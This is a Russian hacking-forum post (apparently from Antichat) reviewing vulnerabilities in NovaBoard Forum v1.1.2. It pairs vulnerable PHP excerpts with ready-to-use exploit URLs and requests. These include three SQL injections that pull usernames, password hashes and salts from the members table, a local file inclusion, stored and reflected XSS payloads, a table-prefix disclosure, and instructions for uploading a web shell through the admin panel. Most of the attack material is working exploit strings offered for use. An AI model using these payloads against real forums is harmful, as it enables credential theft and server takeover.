Форум АНТИЧАТ - [Обзор уязвимостей NovaBoard]

Обзор уязвимостей NovaBoard Forum

Official site: www.novaboard.net
Latest release: NovaBoard v1.1.2

------------------------------------------------------------------------------
Default table prefix: novaboard_
Table with users: members
Columns:

Код:

|id|name|usertitle|email|role|password|password_time|pass_salt|theme|board_lang|time_offset|read_all_posts|avatar|remote_avatar|signature|location|nationality|msn|aol|yahoo|skype|xbox|wii|ps3|last_online|warn_level|suspend_date|whiteboard|register_date|verified|user_posts|banned|new_pms|allow_admin_email|moderate|subscribe_pm|never_spam|

Алгоритм хэширования паролей:

Код:

// Generate salt...

$salt = substr(md5(uniqid(rand(), true)), 0, 9);

// Salt the password

$password= md5($password . $salt);

------------------------------------------------------------------------------

SQL injection

#1
Vuln file: /includes/pages/search.php

Код:

/*...*/

$forum=implode(",",$_GET['forums']);

$forum = htmlentities($forum);

$forum = escape_string($forum);

/*...*/

$sql989 = "SELECT MEMBER, TIME, TOPIC_ID, FORUM_ID, CONTENT, ID, EDIT_TIME, EDIT_MEMBER, MATCH(TITLE, DESCRIPTION, CONTENT) AGAINST ('*$searchstring*' IN BOOLEAN MODE) AS score FROM {$db_prefix}posts WHERE FORUM_ID IN($forum) AND TIME >= '$startdate' AND TIME <= '$enddate' AND MEMBER='$id' AND APPROVED='1' AND MATCH(TITLE, DESCRIPTION, CONTENT) AGAINST ('*$searchstring*' IN BOOLEAN MODE) ORDER BY score DESC";

}

/*...*/

Exploit:

Код:

http://[host]/[path]/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1)+union+select+null,null,null,5,concat_ws(0x3a,name,password,pass_salt),null,null,null,null+from+[prefix]members+where+id=1+--+

#2
Vuln file: /includes/forums/addreply.php

Код:

if ($_COOKIE['mqpid']!=''){



$array=array($_COOKIE['mqpid']);

$array = implode(",",$array);

$quote="";



$query217 = "select MEMBER, CONTENT, TOPIC_ID, ID  from {$db_prefix}posts WHERE ID IN($array) ORDER BY ID desc";

$result217 = mysql_query($query217) or die("addreply.php - Error in query: $query217") ;

Need: user account
Exploit:

Код:

GET http://[host]/[path]/index.php?func=addreply&topic=1 HTTP/1.0



Cookie: mqpid=1) union select null,concat_ws(0x3a,name,password,pass_salt),null,null from [prefix]members where id=1/*

#3
Vuln file: /includes/header.php

Код:

/*...*/

                if (isset($_GET['topic']) && ($_GET['page']!='search')){



                        $location_text="";



                        $query211 = "select CONTENT from {$db_prefix}posts WHERE TOPIC_ID='$topic' AND TITLE!=''";

                        $result211 = mysql_query($query211) or die("topic.php - Error in query: $query211");

/*...*/

Need: magic_quotes = OFF
Exploit:

Код:

http://[host]/[path]/index.php?page=list&forum=1&topic=xek'+union+select+concat_ws(0x3a,name,password,pass_salt)+from+[prefix]members+where+id=1+--+

Note: Вывод ищем в исходном коде страницы:

Код:

<meta name="description" content="{login:hash:salt}" />

Local File Inclusion

Vuln file: /includes/structure.php

Код:

/*...*/

                        $page        =        escape_string($_GET['page']);

/*...*/

                if (file_exists("themes/$theme/includes/pages/$page.php")){

                        include "themes/$theme/includes/pages/$page.php";

                }

                elseif (include("includes/pages/$page.php")){

                }

/*...*/

Exploit:

Код:

http://[host]/[path]/index.php?page=../../download

Note: null byte экранируется...

Active XSS
Exploit:

Код:

[img]javascript:alert(1)[/img]

Note: уязвимость в add reply

Passive XSS
Exploit:

Код:

http://[host]/[path]/index.php?page=search&search=xek&topic=1"><script>alert(1)</script>



http://[host]/[path]/index.php?page=search&search=xek&author_id=1"><script>alert(1)</script>



http://[host]/[path]/index.php?page=search&search=xek&author=1"><script>alert(1)</script>



http://[host]/[path]/index.php?page=search&search=xek&startdate=1"><script>alert(1)</script>



http://[host]/[path]/index.php?page=search&search=xek&enddate=1"><script>alert(1)</script>

XSS in URI
Exploit:

Код:

http://[host]/[path]/index.php/"><script>alert(1)</script>

Disclosure of Table Prefix
Exploit:

Код:

http://[host]/[path]/index.php?topic=1&limit=x

Note: на это форум выдаст примерно такую ошибку:

Цитата:

topic.php - Error in query: select MEMBER, TIME, FORUM_ID, CONTENT, ID, EDIT_TIME, EDIT_MEMBER, EDIT_REASON, TITLE, DESCRIPTION, STICKY, ANNOUNCE, REPORTED, APPROVED from novaboard_posts WHERE TOPIC_ID='1' AND APPROVED='1' ORDER BY TIME asc LIMIT -30, 30

------------------------------------------------------------------------------
Upload shell from Admin CP

Пакуем шелл winzip'ом
Далее переходим в Admin CP --> Board Settings --> Modules Settings
аплодим наш чудо-модуль..
Шелл будет находиться в /modules/[name_shell].php

Таким же способом можно залить через Themes Settings
шелл будет в папке themes
------------------------------------------------------------------------------
P.S. все найденные уязвимости тестировались на NovaBoard v1.1.2. Есть большая вероятность что эти уязвимости будут работать и на более ранних версиях.